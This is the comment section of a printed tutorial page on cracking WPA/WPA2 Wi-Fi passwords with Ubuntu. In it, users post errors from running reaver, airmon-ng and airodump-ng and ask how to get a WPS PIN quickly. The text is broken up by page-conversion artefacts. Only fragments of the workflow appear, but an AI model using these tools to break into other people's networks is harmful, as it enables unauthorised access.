Is it supposed to say this? Im new to this. root@ubuntu:~/reaver-1.4/src# airmon-ng start wlan0 Found 5 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them! PID Name 2382 avahi-daemon 2384 avahi-daemon 3297 NetworkManager 6570 wpa_supplicant 6599 dhclient Process with PID 6599 (dhclient) is running on interface wlan0 Interface Chipset Driver https://www.learn2crack.com/2013/07/learn-to-hack-wifi-password-with-ubuntu.html
26/28
6/27/2016
Learn to Hack WIFI password with Ubuntu (WPA/WPA2)
wlan0 Broadcom wl – [phy0]mon0: ERROR while getting interface ags: No such device (monitor mode enabled on mon0) timmy
>why is my computer saying that make and make install arn’t commands? ayan
root@Ayan-Pc:~/reaver-1.4# airodump-ng mon0 Interface mon0: ioctl(SIOCGIFINDEX) failed: No such device root@Ayan-Pc:~/reaver-1.4# sudo -s
Jackie Sharma getting error after hiting
airmon-ng start wlan0
it17 says command not found 1
Dhani Oliver Nababan
can i do tha stuff on oracle virtual pc..?
everything instaled. but it says “no such device” in the end. airodump-ng mon0 no such device. any one can help?
Jordan
Please help ARP linktype is set to 1 (Ethernet) – expected ARPHRD_IEEE80211, ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead. Make sure RFMON is enabled: run ‘airmon-ng start wlan0 ‘ Sysfs injection support was not found either. Gotlieb Nakuumba
Hi I am almost there with my installation and I have read the notes on the other forum but to no avail, please nd attached and please help Furkan
when ı type ‘make install’ (step 8) ı’ll get {error 1} how can i x? /Mac book pro-2011 late hakku
while typing airmon-ng it says run it as root and gives to respond.. What is the solving way for it? Aboud Scott https://www.learn2crack.com/2013/07/learn-to-hack-wifi-password-with-ubuntu.html
27/28
6/27/2016
Learn to Hack WIFI password with Ubuntu (WPA/WPA2)
type “sudo -s” rst to enter root Armin
Thanks, but how can we get Wps Pin only quickly ?? Abhishek
root@abhishek-HP-Pavilion-g4-Notebook-PC:~# airodump-ng mon0 ioctl(SIOCSIFFLAGS) failed: Name not unique on network it says name not unique on network…?? what should i do to resolve that..??? Richard
17 1
https://www.learn2crack.com/2013/07/learn-to-hack-wifi-password-with-ubuntu.html
28/28
View more...
Comments